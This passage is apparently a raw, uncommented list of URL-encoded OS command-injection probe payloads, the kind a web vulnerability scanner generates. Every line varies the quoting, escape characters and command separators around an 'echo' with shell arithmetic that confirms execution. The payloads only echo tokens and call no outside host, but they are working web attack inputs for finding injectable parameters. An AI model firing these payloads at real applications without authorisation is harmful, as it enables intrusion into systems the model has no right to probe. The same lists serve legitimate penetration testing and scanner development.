20PMWJRH$((60%2B59))$(echo%20PMWJRH)PMWJRH%5C%5C\n'%7Cecho%20RHSIRJ$((85%2B6))$(echo%20RHSIRJ)RHSIRJ%5C%5C\n'%7C%7Cecho%20NEBEJR$((3%2B38))$(echo%20NEBEJR)NEBEJR%5C%5C\n'echo%20OLRHZX$((22%2B72))$(echo%20OLRHZX)OLRHZX%2F%2F\n'%20echo%20PPRCPS$((95%2B69))$(echo%20PPRCPS)PPRCPS%2F%2F\n';echo%20ICITTS$((63%2B83))$(echo%20ICITTS)ICITTS%2F%2F\n'&echo%20FXSADU$((58%2B85))$(echo%20FXSADU)FXSADU%2F%2F\n'|echo%20NINPLO$((85%2B22))$(echo%20NINPLO)NINPLO%2F%2F\n'||echo%20UAPCZM$((19%2B50))$(echo%20UAPCZM)UAPCZM%2F%2F\n'&&echo%20JGTGES$((48%2B34))$(echo%20JGTGES)JGTGES%2F%2F\n'%0aecho%20QVUNCP$((53%2B11))$(echo%20QVUNCP)QVUNCP%2F%2F\n'%3Becho%20GHQCJV$((24%2B65))$(echo%20GHQCJV)GHQCJV%2F%2F\n'%26echo%20ZXUJMM$((66%2B53))$(echo%20ZXUJMM)ZXUJMM%2F%2F\n'%26%26echo%20UWWBJC$((28%2B91))$(echo%20UWWBJC)UWWBJC%2F%2F\n'%7Cecho%20ZGANEQ$((95%2B91))$(echo%20ZGANEQ)ZGANEQ%2F%2F\n'%7C%7Cecho%20WVNPRW$((44%2B23))$(echo%20WVNPRW)WVNPRW%2F%2F\n'echo%20ZQODFO$((38%2B30))$(echo%20ZQODFO)ZQODFO%26\n'%20echo%20VBRTZG$((57%2B99))$(echo%20VBRTZG)VBRTZG%26\n';echo%20EDEYQK$((45%2B89))$(echo%20EDEYQK)EDEYQK%26\n'&echo%20HUEWVL$((15%2B9))$(echo%20HUEWVL)HUEWVL%26\n'|echo%20FWJJDN$((64%2B27))$(echo%20FWJJDN)FWJJDN%26\n'||echo%20DJIUPG$((86%2B80))$(echo%20DJIUPG)DJIUPG%26\n'&&echo%20LQMLDZ$((74%2B43))$(echo%20LQMLDZ)LQMLDZ%26\n'%0aecho%20VECHDM$((44%2B40))$(echo%20VECHDM)VECHDM%26\n'%3Becho%20ZPQVVV$((58%2B25))$(echo%20ZPQVVV)ZPQVVV%26\n'%26echo%20IECZZA$((76%2B1))$(echo%20IECZZA)IECZZA%26\n'%26%26echo%20WRWTAS$((61%2B67))$(echo%20WRWTAS)WRWTAS%26\n'%7Cecho%20VBTZIY$((45%2B53))$(echo%20VBTZIY)VBTZIY%26\n'%7C%7Cecho%20QOWWZU$((31%2B94))$(echo%20QOWWZU)QOWWZU%26\n'echo%20NIXAXB$((47%2B23))$(echo%20NIXAXB)NIXAXB%7C\n'%20echo%20MIVIHV$((7%2B58))$(echo%20MIVIHV)MIVIHV%7C\n';echo%20CYLOAT$((50%2B30))$(echo%20CYLOAT)CYLOAT%7C\n'&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C\n'|echo%20DTSQRM$((82%2B33))$(echo%20DTSQRM)DTSQRM%7C\n'||echo%20SPFQXR$((54%2B70))$(echo%20SPFQXR)SPFQXR%7C\n'&&echo%20TQZUUM$((43%2B5))$(echo%20TQZUUM)TQZUUM%7C\n'%0aecho%20LRJXVV$((74%2B11))$(echo%20LRJXVV)LRJXVV%7C\n'%3Becho%20QGYQUP$((35%2B73))$(echo%20QGYQUP)QGYQUP%7C\n'%26echo%20SYNXTK$((0%2B99))$(echo%20SYNXTK)SYNXTK%7C\n'%26%26echo%20MIQKPQ$((80%2B18))$(echo%20MIQKPQ)MIQKPQ%7C\n'%7Cecho%20HKFPKH$((65%2B16))$(echo%20HKFPKH)HKFPKH%7C\n'%7C%7Cecho%20FUFIPG$((27%2B62))$(echo%20FUFIPG)FUFIPG%7C\n\"echo%20UFAGYK$((82%2B39))$(echo%20UFAGYK)UFAGYK\n\"%20echo%20IXTSZA$((19%2B14))$(echo%20IXTSZA)IXTSZA\n\";echo%20BJMUOS$((51%2B32))$(echo%20BJMUOS)BJMUOS\n\"&echo%20CYVXHL$((2%2B25))$(echo%20CYVXHL)CYVXHL\n\"|echo%20JFFFCK$((98%2B39))$(echo%20JFFFCK)JFFFCK\n\"||echo%20JZKWAX$((82%2B62))$(echo%20JZKWAX)JZKWAX\n\"&&echo%20PFNZYT$((53%2B30))$(echo%20PFNZYT)PFNZYT\n\"%0aecho%20CJDAVC$((37%2B56))$(echo%20CJDAVC)CJDAVC\n\"%3Becho%20XKMIXJ$((55%2B55))$(echo%20XKMIXJ)XKMIXJ\n\"%26echo%20XPABSL$((91%2B48))$(echo%20XPABSL)XPABSL\n\"%26%26echo%20MSODXX$((98%2B77))$(echo%20MSODXX)MSODXX\n\"%7Cecho%20NIUSSD$((14%2B80))$(echo%20NIUSSD)NIUSSD\n\"%7C%7Cecho%20ZXHQBT$((34%2B29))$(echo%20ZXHQBT)ZXHQBT\n\"echo%20LROQVJ$((59%2B51))$(echo%20LROQVJ)LROQVJ'\n\"%20echo%20AWPUDF$((45%2B83))$(echo%20AWPUDF)AWPUDF'\n\";echo%20DHCQNM$((60%2B94))$(echo%20DHCQNM)DHCQNM'\n\"&echo%20AMSBLU$((47%2B94))$(echo%20AMSBLU)AMSBLU'\n\"|echo%20DKGJRP$((17%2B97))$(echo%20DKGJRP)DKGJRP'\n\"||echo%20TABSEM$((52%2B6))$(echo%20TABSEM)TABSEM'\n\"&&echo%20YPKEUZ$((26%2B62))$(echo%20YPKEUZ)YPKEUZ'\n\"%0aecho%20UIFJEM$((39%2B5))$(echo%20UIFJEM)UIFJEM'\n\"%3Becho%20RBDSUF$((59%2B65))$(echo%20RBDSUF)RBDSUF'\n\"%26echo%20HKWALZ$((5%2B31))$(echo%20HKWALZ)HKWALZ'\n\"%26%26echo%20XHYRUC$((45%2B24))$(echo%20XHYRUC)XHYRUC'\n\"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR'\n\"%7C%7Cecho%20BOMIAP$((85%2B40))$(echo%20BOMIAP)BOMIAP'\n\"echo%20UEUAGM$((11%2B22))$(echo%20UEUAGM)UEUAGM\"\n\"%20echo%20IWYYYV$((59%2B47))$(echo%20IWYYYV)IWYYYV\"\n\";echo%20NUURLG$((10%2B93))$(echo%20NUURLG)NUURLG\"\n\"&echo%20DTXNAY$((11%2B40))$(echo%20DTXNAY)DTXNAY\"\n\"|echo%20UPRLNQ$((23%2B4))$(echo%20UPRLNQ)UPRLNQ\"\n\"||echo%20VKPFAP$((92%2B94))$(echo%20VKPFAP)VKPFAP\"\n\"&&echo%20KWPRCS$((3%2B21))$(echo%20KWPRCS)KWPRCS\"\n\"%0aecho%20MJVQYB$((44%2B28))$(echo%20MJVQYB)MJVQYB\"\n\"%3Becho%20TMWMCT$((51%2B35))$(echo%20TMWMCT)TMWMCT\"\n\"%26echo%20HCCVWB$((30%2B94))$(echo%20HCCVWB)HCCVWB\"\n\"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM\"\n\"%7Cecho%20FCZDSM$((68%2B91))$(echo%20FCZDSM)FCZDSM\"\n\"%7C%7Cecho%20HTPEMJ$((2%2B19))$(echo%20HTPEMJ)HTPEMJ\"\n\"echo%20OQTVEH$((73%2B9))$(echo%20OQTVEH)OQTVEH\n\"%20echo%20QIOHVO$((71%2B18))$(echo%20QIOHVO)QIOHVO\n\";echo%20HIENCF$((0%2B66))$(echo%20HIENCF)HIENCF\n\"&echo%20IBIYQC$((4%2B38))$(echo%20IBIYQC)IBIYQC\n\"|echo%20FOBRPZ$((91%2B99))$(echo%20FOBRPZ)FOBRPZ\n\"||echo%20KVIAFY$((17%2B57))$(echo%20KVIAFY)KVIAFY\n\"&&echo%20IQZTQY$((96%2B36))$(echo%20IQZTQY)IQZTQY\n\"%0aecho%20PNFTTQ$((20%2B65))$(echo%20PNFTTQ)PNFTTQ\n\"%3Becho%20PDMNTI$((23%2B51))$(echo%20PDMNTI)PDMNTI\n\"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP\n\"%26%26echo%20IJQIDW$((5%2B53))$(echo%20IJQIDW)IJQIDW\n\"%7Cecho%20ZIYCEF$((9%2B56))$(echo%20ZIYCEF)ZIYCEF\n\"%7C%7Cecho%20OMOFYD$((86%2B53))$(echo%20OMOFYD)OMOFYD\n\"echo%20SRQCVS$((48%2B38))$(echo%20SRQCVS)SRQCVS//\n\"%20echo%20BYNNOQ$((5%2B9))$(echo%20BYNNOQ)BYNNOQ//\n\";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB//\n\"&echo%20QZCVQA$((19%2B81))$(echo%20QZCVQA)QZCVQA//\n\"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH//\n\"||echo%20GIRCRN$((15%2B16))$(echo%20GIRCRN)GIRCRN//\n\"&&echo%20KXEBPS$((55%2B92))$(echo%20KXEBPS)KXEBPS//\n\"%0aecho%20JCEFAY$((97%2B37))$(echo%20JCEFAY)JCEFAY//\n\"%3Becho%20MDSQTA$((24%2B10))$(echo%20MDSQTA)MDSQTA//\n\"%26echo%20AIKVYL$((27%2B44))$(echo%20AIKVYL)AIKVYL//\n\"%26%26echo%20YUQTKP$((71%2B23))$(echo%20YUQTKP)YUQTKP//\n\"%7Cecho%20GPGSXE$((20%2B85))$(echo%20GPGSXE)GPGSXE//\n\"%7C%7Cecho%20JDTYJX$((18%2B24))$(echo%20JDTYJX)JDTYJX//\n\"echo%20UWNJQE$((91%2B46))$(echo%20UWNJQE)UWNJQE\\\n\"%20echo%20TZZNSL$((92%2B66))$(echo%20TZZNSL)TZZNSL\\\n\";echo%20IJTGYU$((36%2B47))$(echo%20IJTGYU)IJTGYU\\\n\"&echo%20TRMPTD$((48%2B23))$(echo%20TRMPTD)TRMPTD\\\n\"|echo%20EEOGHF$((87%2B30))$(echo%20EEOGHF)EEOGHF\\\n\"||echo%20EXJSNR$((49%2B13))$(echo%20EXJSNR)EXJSNR\\\n\"&&echo%20PMIRHD$((95%2B94))$(echo%20PMIRHD)PMIRHD\\\n\"%0aecho%20PZDPMF$((67%2B92))$(echo%20PZDPMF)PZDPMF\\\n\"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\\\n\"%26echo%20MBGKIN$((22%2B60))$(echo%20MBGKIN)MBGKIN\\\n\"%26%26echo%20FGFIOR$((55%2B25))$(echo%20FGFIOR)FGFIOR\\\n\"%7Cecho%20XTLLDX$((25%2B20))$(echo%20XTLLDX)XTLLDX\\\n\"%7C%7Cecho%20HKHVFC$((85%2B7))$(echo%20HKHVFC)HKHVFC\\\n\"echo%20TPIIXD$((67%2B79))$(echo%20TPIIXD)TPIIXD&\n\"%20echo%20FEKBSB$((80%2B66))$(echo%20FEKBSB)FEKBSB&\n\";echo%20DNJXZB$((38%2B82))$(echo%20DNJXZB)DNJXZB&\n\"&echo%20JNXUVW$((81%2B20))$(echo%20JNXUVW)JNXUVW&\n\"|echo%20BKRUJQ$((5%2B96))$(echo%20BKRUJQ)BKRUJQ&\n\"||echo%20TNFYTM$((72%2B96))$(echo%20TNFYTM)TNFYTM&\n\"&&echo%20AEAXJF$((73%2B78))$(echo%20AEAXJF)AEAXJF&\n\"%0aecho%20DDWDPN$((91%2B29))$(echo%20DDWDPN)DDWDPN&\n\"%3Becho%20UZGZPC$((74%2B69))$(echo%20UZGZPC)UZGZPC&\n\"%26echo%20CXIGLR$((26%2B78))$(echo%20CXIGLR)CXIGLR&\n\"%26%26echo%20EXRBWP$((2%2B65))$(echo%20EXRBWP)EXRBWP&\n\"%7Cecho%20ZOFKJO$((5%2B82))$(echo%20ZOFKJO)ZOFKJO&\n\"%7C%7Cecho%20CTTIVX$((65%2B14))$(echo%20CTTIVX)CTTIVX&\n\"echo%20NMPYVC$((95%2B49))$(echo%20NMPYVC)NMPYVC|\n\"%20echo%20CTFTCJ$((80%2B91))$(echo%20CTFTCJ)CTFTCJ|\n\";echo%20QBISFH$((85%2B18))$(echo%20QBISFH)QBISFH|\n\"&echo%20CCWSNS$((52%2B72))$(echo%20CCWSNS)CCWSNS|\n\"|echo%20IIWZTV$((37%2B92))$(echo%20IIWZTV)IIWZTV|\n\"||echo%20DKOIIU$((52%2B39))$(echo%20DKOIIU)DKOIIU|\n\"&&echo%20ELGGDQ$((2%2B5))$(echo%20ELGGDQ)ELGGDQ|\n\"%0aecho%20QBFOYY$((28%2B31))$(echo%20QBFOYY)QBFOYY|\n\"%3Becho%20QATQCM$((57%2B7))$(echo%20QATQCM)QATQCM|\n\"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF|\n\"%26%26echo%20DBNQDD$((96%2B50))$(echo%20DBNQDD)DBNQDD|\n\"%7Cecho%20BAERUM$((15%2B78))$(echo%20BAERUM)BAERUM|\n\"%7C%7Cecho%20FFARMZ$((95%2B61))$(echo%20FFARMZ)FFARMZ|\n\"echo%20MJEJVE$((54%2B9))$(echo%20MJEJVE)MJEJVE%27\n\"%20echo%20LRNMXI$((82%2B72))$(echo%20LRNMXI)LRNMXI%27\n\";echo%20QNIOIG$((45%2B76))$(echo%20QNIOIG)QNIOIG%27\n\"&echo%20TFMDGN$((33%2B82))$(echo%20TFMDGN)TFMDGN%27\n\"|echo%20CCTRQP$((48%2B16))$(echo%20CCTRQP)CCTRQP%27\n\"||echo%20SAHVEF$((53%2B99))$(echo%20SAHVEF)SAHVEF%27\n\"&&echo%20SKQWDW$((71%2B38))$(echo%20SKQWDW)SKQWDW%27\n\"%0aecho%20LFVTXU$((70%2B65))$(echo%20LFVTXU)LFVTXU%27\n\"%3Becho%20KRGULU$((96%2B71))$(echo%20KRGULU)KRGULU%27\n\"%26echo%20WHBQCR$((5%2B15))$(echo%20WHBQCR)WHBQCR%27\n\"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27\n\"%7Cecho%20NGISBI$((50%2B27))$(echo%20NGISBI)NGISBI%27\n\"%7C%7Cecho%20OESDWI$((60%2B61))$(echo%20OESDWI)OESDWI%27\n\"echo%20XFGDCC$((53%2B64))$(echo%20XFGDCC)XFGDCC%22\n\"%20echo%20BZQFLS$((30%2B41))$(echo%20BZQFLS)BZQFLS%22\n\";echo%20KGVZYK$((88%2B50))$(echo%20KGVZYK)KGVZYK%22\n\"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22\n\"|echo%20LYYMLJ$((68%2B90))$(echo%20LYYMLJ)LYYMLJ%22\n\"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22\n\"&&echo%20IWMDND$((49%2B2))$(echo%20IWMDND)IWMDND%22\n\"%0aecho%20ZRDUWP$((33%2B75))$(echo%20ZRDUWP)ZRDUWP%22\n\"%3Becho%20MMYKAT$((11%2B87))$(echo%20MMYKAT)MMYKAT%22\n\"%26echo%20YWVNNT$((69%2B85))$(echo%20YWVNNT)YWVNNT%22\n\"%26%26echo%20HNBMVY$((5%2B65))$(echo%20HNBMVY)HNBMVY%22\n\"%7Cecho%20WYANEK$((66%2B6))$(echo%20WYANEK)WYANEK%22\n\"%7C%7Cecho%20NVZIAZ$((98%2B45))$(echo%20NVZIAZ)NVZIAZ%22\n\"echo%20VTSNKY$((47%2B67))$(echo%20VTSNKY)VTSNKY%5C%5C\n\"%20echo%20KTLVZA$((31%2B12))$(echo%20KTLVZA)KTLVZA%5C%5C\n\";echo%20LWIARI$((77%2B11))$(echo%20LWIARI)LWIARI%5C%5C\n\"&echo%20YMCHJB$((38%2B99))$(echo%20YMCHJB)YMCHJB%5C%5C\n\"|echo%20DDRLVR$((41%2B36))$(echo%20DDRLVR)DDRLVR%5C%5C\n\"||echo%20OMAHVH$((14%2B99))$(echo%20OMAHVH)OMAHVH%5C%5C\n\"&&echo%20PISJQQ$((33%2B72))$(echo%20PISJQQ)PISJQQ%5C%5C\n\"%0aecho%20SUQJYA$((1%2B59))$(echo%20SUQJYA)SUQJYA%5C%5C\n\"%3Becho%20WADYUK$((6%2B43))$(echo%20WADYUK)WADYUK%5C%5C\n\"%26echo%20TGSMRI$((56%2B34))$(echo%20TGSMRI)TGSMRI%5C%5C\n\"%26%26echo%20FFNJFE$((44%2B38))$(echo%20FFNJFE)FFNJFE%5C%5C\n\"%7Cecho%20QAFEAV$((75%2B66))$(echo%20QAFEAV)QAFEAV%5C%5C\n\"%7C%7Cecho%20PHPVAS$((47%2B19))$(echo%20PHPVAS)PHPVAS%5C%5C\n\"echo%20EPDILQ$((5%2B61))$(echo%20EPDILQ)EPDILQ%2F%2F\n\"%20echo%20KGLFRE$((0%2B31))$(echo%20KGLFRE)KGLFRE%2F%2F\n\";echo%20EXOUDI$((91%2B14))$(echo%20EXOUDI)EXOUDI%2F%2F\n\"&echo%20MTBNOE$((46%2B26))$(echo%20MTBNOE)MTBNOE%2F%2F\n\"|echo%20CPTRGO$((21%2B79))$(echo%20CPTRGO)CPTRGO%2F%2F\n\"||echo%20QDYNED$((79%2B86))$(echo%20QDYNED)QDYNED%2F%2F\n\"&&echo%20NMVRBB$((60%2B26))$(echo%20NMVRBB)NMVRBB%2F%2F\n\"%0aecho%20BGHKOM$((19%2B31))$(echo%20BGHKOM)BGHKOM%2F%2F\n\"%3Becho%20NQDGAY$((73%2B33))$(echo%20NQDGAY)NQDGAY%2F%2F\n\"%26echo%20QSDXQR$((21%2B3))$(echo%20QSDXQR)QSDXQR%2F%2F\n\"%26%26echo%20KAOPJJ$((97%2B96))$(echo%20KAOPJJ)KAOPJJ%2F%2F\n\"%7Cecho%20FXXYAL$((38%2B83))$(echo%20FXXYAL)FXXYAL%2F%2F\n\"%7C%7Cecho%20UBEZEA$((22%2B25))$(echo%20UBEZEA)UBEZEA%2F%2F\n\"echo%20WXRSMM$((62%2B81))$(echo%20WXRSMM)WXRSMM%26\n\"%20echo%20OQFTMT$((91%2B48))$(echo%20OQFTMT)OQFTMT%26\n\";echo%20KLODWM$((81%2B43))$(echo%20KLODWM)KLODWM%26\n\"&echo%20LHBNPU$((26%2B5))$(echo%20LHBNPU)LHBNPU%26\n\"|echo%20GLNWTR$((75%2B96))$(echo%20GLNWTR)GLNWTR%26\n\"||echo%20GRZSSH$((83%2B88))$(echo%20GRZSSH)GRZSSH%26\n\"&&echo%20FLLKBG$((76%2B53))$(echo%20FLLKBG)FLLKBG%26\n\"%0aecho%20QBALEF$((39%2B26))$(echo%20QBALEF)QBALEF%26\n\"%3Becho%20WVYDHU$((64%2B10))$(echo%20WVYDHU)WVYDHU%26\n\"%26echo%20YKYSMI$((14%2B15))$(echo%20YKYSMI)YKYSMI%26\n\"%26%26echo%20TZMDSB$((68%2B98))$(echo%20TZMDSB)TZMDSB%26\n\"%7Cecho%20JUMRWV$((18%2B92))$(echo%20JUMRWV)JUMRWV%26\n\"%7C%7Cecho%20NLZITW$((11%2B41))$(echo%20NLZITW)NLZITW%26\n\"echo%20BNHMPM$((4%2B77))$(echo%20BNHMPM)BNHMPM%7C\n\"%20echo%20TZKEKG$((48%2B96))$(echo%20TZKEKG)TZKEKG%7C\n\";echo%20IBQUEF$((98%2B95))$(echo%20IBQUEF)IBQUEF%7C\n\"&echo%20EHEGZM$((64%2B33))$(echo%20EHEGZM)EHEGZM%7C\n\"|echo%20XTNGGL$((91%2B22))$(echo%20XTNGGL)XTNGGL%7C\n\"||echo%20OHBDBS$((38%2B62))$(echo%20OHBDBS)OHBDBS%7C\n\"&&echo%20IOUKTY$((23%2B26))$(echo%20IOUKTY)IOUKTY%7C\n\"%0aecho%20JLXCCQ$((76%2B40))$(echo%20JLXCCQ)JLXCCQ%7C\n\"%3Becho%20WRYICW$((92%2B9))$(echo%20WRYICW)WRYICW%7C\n\"%26echo%20LNTOCN$((59%2B67))$(echo%20LNTOCN)LNTOCN%7C\n\"%26%26echo%20WSLHMV$((15%2B92))$(echo%20WSLHMV)WSLHMV%7C\n\"%7Cecho%20ICAVIW$((19%2B96))$(echo%20ICAVIW)ICAVIW%7C\n\"%7C%7Cecho%20TSQXVM$((77%2B52))$(echo%20TSQXVM)TSQXVM%7C\n|echo%20XHGLDQ$((49%2B17))$(echo%20XHGLDQ)XHGLDQ\n|%20echo%20USBVMG$((4%2B90))$(echo%20USBVMG)USBVMG\n;echo%20ESBMYC$((3%2B57))$(echo%20ESBMYC)ESBMYC\n&echo%20DPXLYV$((75%2B2))$(echo%20DPXLYV)DPXLYV\n|echo%20WKXARD$((95%2B10))$(echo%20WKXARD)WKXARD\n||echo%20QQNXUE$((73%2B58))$(echo%20QQNXUE)QQNXUE\n&&echo%20WMETWL$((1%2B53))$(echo%20WMETWL)WMETWL\n%0aecho%20VFMAJZ$((49%2B82))$(echo%20VFMAJZ)VFMAJZ\n%3Becho%20EFMVRM$((22%2B51))$(echo%20EFMVRM)EFMVRM\n%26echo%20CFQNOE$((61%2B46))$(echo%20CFQNOE)CFQNOE\n%26%26echo%20DTVUWP$((97%2B67))$(echo%20DTVUWP)DTVUWP\n%7Cecho%20NIEMKE$((13%2B11))$(echo%20NIEMKE)NIEMKE\n%7C%7Cecho%20KTTKHD$((67%2B44))$(echo%20KTTKHD)KTTKHD\necho%20KBEMAI$((13%2B27))$(echo%20KBEMAI)KBEMAI'\n%20echo%20PQVHOY$((31%2B46))$(echo%20PQVHOY)PQVHOY'\n;echo%20CUJAIZ$((32%2B35))$(echo%20CUJAIZ)CUJAIZ'\n&echo%20PLNWCY$((48%2B70))$(echo%20PLNWCY)PLNWCY'\n|echo%20FHWWQB$((42%2B27))$(echo%20FHWWQB)FHWWQB'\n||echo%20ZSEPNF$((89%2B60))$(echo%20ZSEPNF)ZSEPNF'\n&&echo%20ZVYTEU$((90%2B87))$(echo%20ZVYTEU)ZVYTEU'\n%0aecho%20RWVTYR$((38%2B86))$(echo%20RWVTYR)RWVTYR'\n%3Becho%20PDWIBS$((76%2B7))$(echo%20PDWIBS)PDWIBS'\n%26echo%20VDRXRP$((8%2B96))$(echo%20VDRXRP)VDRXRP'\n%26%26echo%20KOBQCV$((27%2B2))$(echo%20KOBQCV)KOBQCV'\n%7Cecho%20UZKGGW$((60%2B30))$(echo%20UZKGGW)UZKGGW'\n%7C%7Cecho%20HVEVCZ$((20%2B29))$(echo%20HVEVCZ)HVEVCZ'\necho%20NRCXSS$((87%2B18))$(echo%20NRCXSS)NRCXSS\"\n%20echo%20RPDFEQ$((68%2B74))$(echo%20RPDFEQ)RPDFEQ\"\n;echo%20VFFQVI$((85%2B47))$(echo%20VFFQVI)VFFQVI\"\n&echo%20CUKTGK$((2%2B61))$(echo%20CUKTGK)CUKTGK\"\n|echo%20WJNDLY$((76%2B22))$(echo%20WJNDLY)WJNDLY\"\n||echo%20YZMMII$((39%2B60))$(echo%20YZMMII)YZMMII\"\n&&echo%20ARDPUW$((94%2B28))$(echo%20ARDPUW)ARDPUW\"\n%0aecho%20UNXWMT$((40%2B95))$(echo%20UNXWMT)UNXWMT\"\n%3Becho%20NAPRQZ$((30%2B63))$(echo%20NAPRQZ)NAPRQZ\"\n%26echo%20UCMRWH$((43%2B12))$(echo%20UCMRWH)UCMRWH\"\n%26%26echo%20WXDFTC$((82%2B43))$(echo%20WXDFTC)WXDFTC\"\n%7Cecho%20WEFNXM$((36%2B97))$(echo%20WEFNXM)WEFNXM\"\n%7C%7Cecho%20FCVZMK$((81%2B22))$(echo%20FCVZMK)FCVZMK\"\necho%20OQDPSL$((47%2B24))$(echo%20OQDPSL)OQDPSL\n%20echo%20SILUZP$((90%2B7))$(echo%20SILUZP)SILUZP\n;echo%20ROYDKA$((65%2B12))$(echo%20ROYDKA)ROYDKA\n&echo%20FGFXYB$((41%2B62))$(echo%20FGFXYB)FGFXYB\n|echo%20TTDDZC$((95%2B92))$(echo%20TTDDZC)TTDDZC\n||echo%20VXNNZC$((25%2B32))$(echo%20VXNNZC)VXNNZC\n&&echo%20TQHCUN$((6%2B71))$(echo%20TQHCUN)TQHCUN\n%0aecho%20LLPOAO$((93%2B93))$(echo%20LLPOAO)LLPOAO\n%3Becho%20QPNMNQ$((33%2B62))$(echo%20QPNMNQ)QPNMNQ\n%26echo%20BCONMT$((21%2B78))$(echo%20BCONMT)BCONMT\n%26%26echo%20HRLRGU$((89%2B5))$(echo%20HRLRGU)HRLRGU\n%7Cecho%20MSOAVP$((20%2B27))$(echo%20MSOAVP)MSOAVP\n%7C%7Cecho%20NYSCWX$((31%2B90))$(echo%20NYSCWX)NYSCWX\necho%20GCITOP$((61%2B30))$(echo%20GCITOP)GCITOP//\n%20echo%20FKCLCN$((17%2B95))$(echo%20FKCLCN)FKCLCN//\n;echo%20RAOGCR$((98%2B45))$(echo%20RAOGCR)RAOGCR//\n&echo%20NLPFSA$((24%2B13))$(echo%20NLPFSA)NLPFSA//\n|echo%20UTOZMO$((44%2B11))$(echo%20UTOZMO)UTOZMO//\n||echo%20XYTCPC$((29%2B30))$(echo%20XYTCPC)XYTCPC//\n&&echo%20NCEXJG$((72%2B12))$(echo%20NCEXJG)NCEXJG//\n%0aecho%20XSPTNK$((94%2B10))$(echo%20XSPTNK)XSPTNK//\n%3Becho%20RQIPKI$((2%2B84))$(echo%20RQIPKI)RQIPKI//\n%26echo%20NCDDER$((2%2B81))$(echo%20NCDDER)NCDDER//\n%26%26echo%20KPDDNO$((99%2B75))$(echo%20KPDDNO)KPDDNO//\n%7Cecho%20MSSIPE$((43%2B93))$(echo%20MSSIPE)MSSIPE//\n%7C%7Cecho%20ZZFTJX$((6%2B69))$(echo%20ZZFTJX)ZZFTJX//\necho%20SPARDK$((38%2B33))$(echo%20SPARDK)SPARDK\\\n%20echo%20WIJKEI$((0%2B41))$(echo%20WIJKEI)WIJKEI\\\n;echo%20DQKPUN$((89%2B48))$(echo%20DQKPUN)DQKPUN\\\n&echo%20FQACTW$((22%2B3))$(echo%20FQACTW)FQACTW\\\n|echo%20CAUDBF$((21%2B9))$(echo%20CAUDBF)CAUDBF\\\n||echo%20ERSZFY$((55%2B21))$(echo%20ERSZFY)ERSZFY\\\n&&echo%20JLZBTB$((60%2B18))$(echo%20JLZBTB)JLZBTB\\\n%0aecho%20YZOZQS$((66%2B37))$(echo%20YZOZQS)YZOZQS\\\n%3Becho%20FREAIO$((83%2B11))$(echo%20FREAIO)FREAIO\\\n%26echo%20XMWQUR$((78%2B32))$(echo%20XMWQUR)XMWQUR\\\n%26%26echo%20CQZWFA$((30%2B41))$(echo%20CQZWFA)CQZWFA\\\n%7Cecho%20SBQEFZ$((80%2B12))$(echo%20SBQEFZ)SBQEFZ\\\n%7C%7Cecho%20MMJATU$((39%2B34))$(echo%20MMJATU)MMJATU\\\necho%20PZDGKF$((44%2B50))$(echo%20PZDGKF)PZDGKF&\n%20echo%20GRYEIF$((54%2B91))$(echo%20GRYEIF)GRYEIF&\n;echo%20KTOGAF$((50%2B40))$(echo%20KTOGAF)KTOGAF&\n&echo%20ANYKUW$((28%2B42))$(echo%20ANYKUW)ANYKUW&\n|echo%20NDQGOQ$((5%2B63))$(echo%20NDQGOQ)NDQGOQ&\n||echo%20ZQDJTK$((80%2B61))$(echo%20ZQDJTK)ZQDJTK&\n&&echo%20EFKXWC$((29%2B48))$(echo%20EFKXWC)EFKXWC&\n%0aecho%20OJUIJZ$((60%2B38))$(echo%20OJUIJZ)OJUIJZ&\n%3Becho%20HGJGSA$((25%2B26))$(echo%20HGJGSA)HGJGSA&\n%26echo%20DFYQEU$((76%2B77))$(echo%20DFYQEU)DFYQEU&\n%26%26echo%20ZCRZFW$((63%2B13))$(echo%20ZCRZFW)ZCRZFW&\n%7Cecho%20PSOVYF$((34%2B8))$(echo%20PSOVYF)PSOVYF&\n%7C%7Cecho%20GFQYZE$((23%2B31))$(echo%20GFQYZE)GFQYZE&\necho%20TBRADG$((53%2B31))$(echo%20TBRADG)TBRADG|\n%20echo%20PBUFFX$((8%2B76))$(echo%20PBUFFX)PBUFFX|\n;echo%20UKUZES$((38%2B87))$(echo%20UKUZES)UKUZES|\n&echo%20QVKVEF$((65%2B70))$(echo%20QVKVEF)QVKVEF|\n|echo%20QAVNFZ$((68%2B13))$(echo%20QAVNFZ)QAVNFZ|\n||echo%20QUULXG$((42%2B65))$(echo%20QUULXG)QUULXG|\n&&echo%20ECAYHK$((20%2B55))$(echo%20ECAYHK)ECAYHK|\n%0aecho%20EZVLSY$((12%2B10))$(echo%20EZVLSY)EZVLSY|\n%3Becho%20HFWMJZ$((75%2B92))$(echo%20HFWMJZ)HFWMJZ|\n%26echo%20FRKJNT$((96%2B80))$(echo%20FRKJNT)FRKJNT|\n%26%26echo%20LSCMRZ$((76%2B36))$(echo%20LSCMRZ)LSCMRZ|\n%7Cecho%20HXHRTD$((13%2B48))$(echo%20HXHRTD)HXHRTD|\n%7C%7Cecho%20NLRFUJ$((16%2B3))$(echo%20NLRFUJ)NLRFUJ|\necho%20DGPFLA$((83%2B1))$(echo%20DGPFLA)DGPFLA%27\n%20echo%20DCVFLD$((69%2B75))$(echo%20DCVFLD)DCVFLD%27\n;echo%20NHFBAI$((91%2B84))$(echo%20NHFBAI)NHFBAI%27\n&echo%20JOKPJU$((39%2B3))$(echo%20JOKPJU)JOKPJU%27\n|echo%20IQEMUQ$((97%2B10))$(echo%20IQEMUQ)IQEMUQ%27\n||echo%20BTEWHM$((5%2B57))$(echo%20BTEWHM)BTEWHM%27\n&&echo%20MNUDNV$((12%2B9))$(echo%20MNUDNV)MNUDNV%27\n%0aecho%20SATWYE$((53%2B54))$(echo%20SATWYE)SATWYE%27\n%3Becho%20SETBTR$((9%2B96))$(echo%20SETBTR)SETBTR%27\n%26echo%20KNBVGS$((2